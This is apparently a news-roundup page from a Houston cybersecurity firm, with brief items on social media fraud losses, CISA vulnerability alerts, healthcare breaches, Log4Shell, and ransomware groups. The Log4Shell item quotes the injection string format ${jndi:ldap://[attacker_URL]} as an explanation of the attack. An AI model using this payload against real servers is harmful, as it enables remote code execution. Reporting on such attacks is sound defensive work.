News
FTC: Americans lost $770 million from social media fraud surge
More than one in four people who reported losing money to fraud in 2021 said it started on social media with an ad, a post, or a message. In fact, the data suggest that social media was far more profitable to scammers in 2021 than any other method of reaching people – the FTC said.
CISA alerts federal agencies of ancient bugs still being exploited
CISA compiled the new list after finding evidence that the security issues newly added to the Catalog of Known Exploited Vulnerabilities are used in ongoing attacks.
Top 10 healthcare breaches in the U.S. exposed data of 19 million
The top ten cyber events with the widest impact listed on the portal of the U.S. Department of Health and Human Services (HHS) Office for Civil Rights are from hacking incidents and account for exposing data of almost 19 million people.
CISA releases Apache Log4j scanner to find vulnerable apps
Log4j-scanner is a project derived from other members of the open-source community by CISA’s Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities, the cybersecurity agency explains.
Hackers start pushing malware in worldwide Log4Shell attacks
To exploit this vulnerability, a threat actor can change their web browser’s user agent and visit a site or search for a string on a website using the format ${jndi:ldap://[attacker_URL]}. Doing so will cause the string to be appended to the web server’s access logs.
CISA urges admins to patch critical Discourse code execution bug
CISA published an alert about the flaw, urging forum admins to update to the latest available version or apply the necessary workarounds.
Police arrest hackers behind over 1,800 ransomware attacks
The arrests took place in Ukraine and Switzerland on October 26, 2021, and as a result of the simultaneous raids, the police seized five luxury vehicles, electronic devices, and $52,000 in cash.
FBI: HelloKitty ransomware adds DDoS attacks to extortion tactics
“Hello Kitty/FiveHands actors demand varying ransom payments in Bitcoin (BTC) that appear tailored to each victim, commensurate with their assessed ability to pay it. If no ransom is paid, the threat actors will post victim data to the Babuk site payload.bin) or sell it to a third-party data broker.”
FBI: Ransomware targets companies during mergers and acquisitions
“The FBI assesses ransomware actors are very likely using significant financial events, such as mergers and acquisitions, to target and leverage victim companies for ransomware infections,” the federal law enforcement agency said.
REvil ransomware is back in full attack mode and leaking data
REvil shut down their infrastructure and completely disappeared after their biggest caper yet – a massive attack on July 2nd that encrypted 60 managed service providers and over 1,500 businesses using a zero-day vulnerability in the Kaseya VSA remote management platform.
Newsletter Sign Up
Contact Us
Learn more about what Techcess CyberSecurity Group can do for your business.
1-833-TXCYBER
1-833-892-9237
Techcess CyberSecurity Group
6110 Clarkson Lane
Houston, Texas 77055
Techcess CyberSecurity Group
Houston, Texas 77055